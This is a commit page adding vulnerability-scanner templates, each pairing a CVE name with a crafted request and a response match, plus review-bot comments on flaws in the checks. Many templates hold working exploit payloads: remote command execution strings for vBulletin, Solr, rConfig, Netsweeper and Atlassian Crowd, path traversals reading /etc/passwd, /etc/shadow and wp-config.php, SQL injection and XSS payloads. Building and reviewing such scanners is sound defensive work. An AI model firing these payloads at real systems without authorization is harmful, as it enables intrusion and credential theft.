UltyScan Documentation Overhaul

2026-01-01 16:33:22 +11:00
commit f046dee832
294 changed files with 250370 additions and 0 deletions


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AWS S3 Public Bucket Listing'
URI=''
METHOD='GET'
MATCH="listbucket"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
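Review bot: `-L` in `CURL_OPTS` lets the request follow redirects to any host, so a `MATCH` hit can come from a site other than the scanned target and be reported against the wrong asset. With `URI=''` and a body match on `listbucket`, that matters most here, since a redirect to someone else's public bucket would be recorded as the target's own. `--insecure` also turns off certificate verification, so the response is not authenticated as coming from the named host. I would document both at the top of the template, e.g. `# body match on the S3 listing XML; -L follows redirects, confirm the final host is in scope`, assuming the loader accepts `#` lines, which this page does not show. The same options recur in nearly every template added by this commit.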


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
METHOD='GET'
MATCH="<title>phpinfo\(\)"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Solr Detected'
URI=''
METHOD='GET'
MATCH="Solr\ Admin"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Tomcat Detected'
URI='/404_DOES_NOT_EXIST'
METHOD='GET'
MATCH="Apache\ Tomcat\/[0-9]?[0-9]\.[0-9]?[0-9]\.[0-9]?[0-9]"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-o'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AvantFAX LOGIN Detected'
URI=''
METHOD='GET'
MATCH="AvantFAX\ LOGIN"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal'
URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
METHOD='GET'
MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
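Review bot: `VULN_NAME` names the wrong product: CVE-2018-13379 is the Fortinet FortiOS SSL VPN path traversal, while Pulse Connect Secure belongs to CVE-2019-11510 in the next template, so findings from this check will be filed against the wrong vendor. Suggested: `VULN_NAME='CVE-2018-13379 - Fortinet FortiOS SSL VPN Directory Traversal'`. The `MATCH` of thirteen escaped dots is a loose signature that any response containing a dotted leader line satisfies. A true hit returns live VPN session data, so the stored output of this check should be handled as sensitive.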


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
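Review bot: `MATCH="root:*:"` is weaker than it looks, because in a grep pattern `:*` means zero or more colons, so the expression reduces to the literal `root:` and fires on any response that contains that text. Anchoring on the passwd field layout, e.g. `MATCH='root:[^:]*:0:0:'`, keeps a P1 finding tied to real file content. The same pattern is used by the CVE-2019-11580, CVE-2019-16662, CVE-2019-17558, CVE-2019-5418, CVE-2019-8982, CVE-2020-17519, CVE-2020-5405, CVE-2020-5902 and CVE-2020-8209 templates in this commit.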


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE'
URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
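Review bot: The `URI` asks the target to return `/etc/shadow`, so a positive result copies password hashes into the scanner's output and logs, which is more than a detection needs. A non-sensitive marker, like the `1787569` value other templates in this commit match on, would show the same condition without collecting credentials. The `/crowd/plugins/servlet/exp` path also does not look like part of a stock install, so a hit may mean the host has already been tampered with; if so, the finding text should say that and point to incident response rather than patching alone.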


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11581 - Jira Template Injection'
URI='/secure/ContactAdministrators!default.jspa'
METHOD='GET'
MATCH='Contact Site Administrators'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
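Review bot: `MATCH='Contact Site Administrators'` only shows that the contact form page is reachable, which is true of patched Jira instances as well, yet the result is reported as `P1 - CRITICAL` under the CVE name. Either add a version condition or report it as exposure, e.g. `VULN_NAME='CVE-2019-11581 - Jira Contact Administrators Form Exposed (version not verified)'` with `SEVERITY='P5 - INFO'`. The CVE-2020-12271, CVE-2020-2555 and CVE-2020-7246 templates in this commit have the same shape: a product or login-page string matched and a critical CVE reported.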


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
URI="/cgi-bin/config.exp"
METHOD='GET'
MATCH="sysconfig"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution'
URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution'
URI='/'
METHOD='POST'
MATCH='1787569'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1787568))%27%29%3B+exit%3B" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass'
URI='/ajax/render/widget_tabbedcontainer_tab_panel'
METHOD='POST'
MATCH='PHP\ Version'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,14 @@
# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
import sys
from seleniumrequests import Firefox
url = sys.argv[1]
# Simple usage with built-in WebDrivers:
webdriver = Firefox()
response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url)
if '1337' in response.text:
print("Vulnerable!")
print(response.text)
webdriver.quit()
SECONDARY_COMMANDS=''
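Review bot: `webdriver.quit()` is only reached when `webdriver.request(...)` returns, so a timeout or connection error leaves a Firefox process behind on the scanning host; wrapping the request and check in `try:` with `finally: webdriver.quit()` fixes that. As far as I know, seleniumrequests returns an ordinary HTTP response, so `response.text` is the raw body rather than the rendered DOM and `'1337' in response.text` can only match when the page happens to contain that number, which would make the result unreliable in both directions. `sys.argv[1]` is read without a length check, and the trailing `SECONDARY_COMMANDS=''` looks like a leftover from the template format. The indentation under `if` is not visible on this page, so I cannot tell whether `print(response.text)` is inside the branch. The second Selenium script in this commit (the `afr.php` check) has the same structure.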


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
URI='/vpn/../vpns/cfg/smb.conf'
METHOD='GET'
MATCH='\[global\]'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E"
METHOD='GET'
MATCH="<script>alert\(1337\)<\/script>"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails'
URI="/../../../../../../../../etc/passwd\{\{"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003'
URI='/node/1?_format=hal_json'
METHOD='GET'
MATCH='INVALID_VALUE\ does\ not\ correspond'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' '
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
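Review bot: The request body on the `CURL_OPTS` line hard-codes `http://192.168.56.101/drupal-8.6.9/...`, a private lab address, so every scan sends that internal URL to the target instead of a value derived from the host under test. The JSON is also wrapped in `\'` inside a single-quoted string; a backslash is not an escape there, so if these files are sourced by a shell (the loader is not shown) the assignment ends at the first `\'` and the rest is parsed as a command. `METHOD='GET'` next to `--data` is contradictory and should be settled one way in the template. The CVE-2020-10204 template uses the same `\'` construct.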


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE'
URI='/photo/p/api/video.php'
METHOD='GET'
MATCH="\[\ 401\ Unauthorized\ \]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
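Review bot: `CURL_OPTS='-L --user-agent '' -s --insecure'` nests `''` inside a single-quoted string, which in shell only closes and reopens the quote, so the value becomes `-L --user-agent  -s --insecure` and curl takes `-s` as the user-agent string instead of running silent. Most other templates avoid this with `CURL_OPTS="--user-agent '' -s -L --insecure"`; using that form here keeps the request identical across checks. The same line appears in the second CVE-2019-8442 template, the four CVE-2019-8451 templates, CVE-2020-10204, both CVE-2020-13167 templates and CVE-2020-7473.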


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 1'
URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
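Review bot: The `-H "X-Atlassian-Token: no-check` header on the `CURL_OPTS` line never closes its double quote, so once the options are expanded the header value swallows the rest of the line and the check cannot run as written; `-H "X-Atlassian-Token: no-check"` is presumably what was meant. The three sibling CVE-2019-8451 templates repeat the line. The result also depends on a third party: a hit requires the target to reach google.com and the page title to stay `Google`, so filtered egress or a changed page gives a false negative, and each scan causes the target to contact an outside host, which the engagement scope should allow for.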


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 2'
URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 3'
URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 4'
URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal'
URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
METHOD='GET'
MATCH="apache2\.conf"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF'
URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services'
URI="/ReportServer/Pages/ReportViewer.aspx"
METHOD='GET'
MATCH="view\ report"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
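Review bot: `CURL_OPTS` ends with `-I`, which makes curl send a HEAD request and print response headers only, while `MATCH="view\ report"` is text from the page body, so unless the runner adds output that this page does not show, the check can never fire and the host is silently reported clean. Dropping `-I` (and adding `-L` as the other templates do) would let the body reach the matcher. Even then the match only shows that the report viewer page is reachable, not that the server is unpatched, so `P1 - CRITICAL` overstates it. The CVE-2020-1147 and CVE-2020-25213 templates pair `-I` with a body pattern in the same way.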


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-10204 - Sonatype Nexus Repository RCE'
URI="/extdirect"
METHOD='POST'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent '' -s --insecure -L --data \'{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}\'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server'
URI="/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
METHOD='GET'
MATCH="List\ does\ not\ exist|It\ may\ have\ been\ deleted\ by\ another\ user"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection'
URI='/wp-content/plugins/chopslider/get_script/index.php?id=1111111'
METHOD='GET'
MATCH='chopslider_id_1111111'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal'
URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
METHOD='GET'
MATCH="root\:x"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 2'
URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
METHOD='GET'
MATCH="root\:x"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 3'
URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
METHOD='GET'
MATCH="DB_NAME|DB_USER|COLLATE"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4'
URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
METHOD='GET'
MATCH="DB_NAME|DB_USER|COLLATE"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection'
URI='/userportal/webpages/myaccount/login.jsp'
METHOD='GET'
MATCH='loginstylesheet'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1'
URI="/ajax/api/content_infraction/getIndexableContent"
METHOD='POST'
MATCH="6162636D31|database\ error"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2'
URI="/vb5/ajax/api/content_infraction/getIndexableContent"
METHOD='POST'
MATCH="6162636D31|database\ error"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3'
URI="/vb5/ajax/api/content_infraction/getIndexableContent"
METHOD='POST'
MATCH="vbulletinrce"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 1'
URI="/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
METHOD='GET'
MATCH="nonexistent"
SEVERITY='P1 - CRITICAL'
CURL_OPTS=' --user-agent '' -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
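Review bot: This check is not read-only: the encoded command in `URI` appears to write a marker file into the product's web admin directory, which the second CVE-2020-13167 template then fetches from `/webadmin/out`, and nothing in either template removes it afterwards. That leaves an artifact on the scanned system and lets a later scan, or any other visitor, see `nonexistent` there regardless of the current patch state, so the second check can report a stale result. The template should at least carry a comment stating that it modifies the target, and the finding text should tell the operator which file to clean up. The `--user-agent ''` quoting problem noted on the CVE-2019-8442 template applies to `CURL_OPTS` here as well.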


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 2'
URI="/webadmin/out"
METHOD='GET'
MATCH="nonexistent"
SEVERITY='P1 - CRITICAL'
CURL_OPTS=' --user-agent '' -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint'
URI="/secure/ViewUserHover.jspa?username=randomUser"
METHOD='GET'
MATCH="User\ does\ not\ exist"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s --insecure -L "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS'
URI='/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(document.domain)>'
METHOD='GET'
MATCH="Oracle\ Business\ Intelligence"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-15129 - Open Redirect In Traefik'
URI='/'
METHOD='GET'
MATCH="<a href=\"https://google.com/dashboard/\">Found</a>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'X-Forwarded-Prefix: https://google.com'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-15920 - Mida eFramework Unauthenticated RCE'
URI='/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING'
METHOD='GET'
MATCH='root\:'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal'
URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection'
URI='/global-protect/login.esp'
METHOD='GET'
MATCH='ETag|Last-Modified'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS=''
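Review bot: `MATCH='ETag|Last-Modified'` cannot separate a vulnerable GlobalProtect portal from a patched one, or from any other web server, since those are ordinary caching headers. `CURL_OPTS` also has neither `-I` nor `-i`, so header names would not normally be in the output being matched, and with `GREP_OPTIONS=''` the `|` is only an alternation if the runner uses extended regex, which this page does not show. As written the check either never fires or fires everywhere, and in both cases `P1 - CRITICAL` is not supported by the evidence. I would report it as `SEVERITY='P5 - INFO'` portal detection until a version condition is added.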


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS'
URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1'
URI="/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2'
URI="/jenkins/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3'
URI="/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4'
URI="/jenkins/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
